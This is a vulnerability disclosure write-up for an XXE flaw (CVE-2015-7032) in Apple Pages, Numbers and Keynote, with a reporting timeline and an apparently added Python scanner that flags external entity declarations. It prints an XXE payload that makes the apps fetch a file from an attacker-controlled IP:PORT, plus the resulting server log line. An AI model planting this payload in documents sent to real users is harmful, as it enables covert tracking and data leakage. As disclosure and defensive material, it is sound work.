Apple Pages, Numbers, Keynote Input Validation and XXE (CVE-2015-7032)


In June 2015, Patrik Fehrenbach and I identified a series of vulnerabilities in a few of Apple’s productivity applications: Pages, Numbers and Keynote, on OS X and on iOS 8.x (or older). In short, the applications failed to validate their input while parsing a document.

Looking at these three applications, they all have one thing in common: once a document is unpacked, it consists of a set of XML files. Let's start with Apple Pages.

Pages 5.6

Archive:  xxe.docx
  inflating: [Content_Types].xml     
   creating: _rels/
  inflating: _rels/.rels             
   creating: docProps/
  inflating: docProps/app.xml        
  inflating: docProps/core.xml       
  inflating: docProps/thumbnail.jpeg  
   creating: word/
   creating: word/_rels/
  inflating: word/_rels/document.xml.rels  
  inflating: word/document.xml       
  inflating: word/fontTable.xml      
  inflating: word/settings.xml       
  inflating: word/styles.xml         
  inflating: word/stylesWithEffects.xml  
   creating: word/theme/
  inflating: word/theme/theme1.xml   
  inflating: word/webSettings.xml

Each XML file in the listing above plays a part in making up the docx document, but the files that caught our attention were:

docProps/app.xml        
docProps/core.xml    
word/document.xml  

From my understanding, the app.xml file stores the application version used and company information. The core.xml file contains information about the system, such as the user who created the file, the date and time, and so on. The document.xml file contains the content placed inside the document. Inserting an XXE payload into any of those files (or all of them) will crash Apple Pages; however, the XML is still parsed before the crash. For this example we’ll use the following payload:


<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE r [<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "IP:PORT/somefile.xml">
%sp;%param1;]>

We can now save the file and pack the archive again. If the file is opened with MS Word, we are told that the file is corrupted, and the same happens with Apple Pages, but in the background we get this hit on our server:

SomeIP - - [24/Jun/2015 03:09:41] "GET /somefile.xml HTTP/1.1" 200 -

So what exactly is happening?

This is also exploitable on iOS 8.x: when the file is sent to an iPhone or an iPad and processed by Pages, the same request is made.
Now that we have successfully exploited this in Apple Pages, are the other two applications exploitable as well?

Numbers and Keynote

The same method demonstrated for Apple Pages applies to Apple Numbers and Keynote.

docProps/app.xml        
docProps/core.xml 

Injecting the same payload into the files mentioned above results in the same behavior, and it is likewise exploitable when the file is opened on an iPhone or iPad (iOS 8).
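The behaviour described for Pages, Numbers and Keynote above comes down to one detectable pattern: a DOCTYPE with an external entity declaration inside one of the package's XML parts. As an added example (not part of the original post, nor Apple's or Microsoft's code), here is a defender-side scanner that unpacks a docx-like package and reports such declarations without ever resolving them; the in-memory package, the attacker.invalid host and all part contents are constructed for this example.

```python
import io
import zipfile
from xml.parsers import expat
# Constructed sample (placeholder host, not a live server): docProps/app.xml carries
# the DOCTYPE + external parameter entity pattern shown above; core.xml is clean.
XXE_APP_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<!DOCTYPE r [<!ELEMENT r ANY >\n'
    '<!ENTITY % sp SYSTEM "http://attacker.invalid/somefile.xml">\n'
    '%sp;%param1;]>\n'
    '<Properties><Application>Example</Application></Properties>\n'
)
CLEAN_CORE_XML = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
                  '<cp:coreProperties xmlns:cp="urn:x"><dc:creator xmlns:dc="urn:y">'
                  'me</dc:creator></cp:coreProperties>\n')

def build_sample_package() -> bytes:
    buf = io.BytesIO()  # docx-like zip held in memory
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/app.xml", XXE_APP_XML)
        z.writestr("docProps/core.xml", CLEAN_CORE_XML)
    return buf.getvalue()

def scan_xml_part(data: bytes) -> list:
    """Report DOCTYPE and external-entity declarations in one XML part. Nothing is fetched:
    no ExternalEntityRefHandler is installed, so expat only reports what the DTD declares."""
    findings, parser = [], expat.ParserCreate()
    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(f"DOCTYPE '{name}'" + (f" external DTD {system_id}" if system_id else ""))
    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id or public_id:  # internal entities (value only) are not XXE
            kind = "parameter" if is_param else "general"
            findings.append(f"external {kind} entity '{name}' -> {system_id or public_id}")
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        pass  # a consumer would crash here, but the declarations were already seen
    return findings

def scan_package(blob: bytes) -> dict:
    """Map each XML part that has findings to its list; an empty dict means clean."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        for name in z.namelist():
            if name.lower().endswith((".xml", ".rels")):
                if hits := scan_xml_part(z.read(name)):
                    report[name] = hits
    return report
```

The same scan applies unchanged to the Numbers and Keynote packages, since the parts that matter are the same docProps/app.xml and docProps/core.xml.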

Timeline:

7/23/2015 – Apple Pages’ Vulnerability report sent
7/23/2015 – Automated reply from Apple
8/25/2015 – Requested an update – No answer
9/14/2015 – Requested another update –
9/14/2015 – Apple acknowledged the vulnerability + Patch to be released soon
9/15/2015 – Apple Keynote’s Vulnerability report sent
9/16/2015 – Automated reply from Apple
9/17/2015 – Apple Numbers’ Vulnerability report sent
9/18/2015 – Automated reply from Apple
9/25/2015 – Requested Update – Still working
10/4/2015 – Issue resolved by Apple
10/15/2015 – CVE assigned
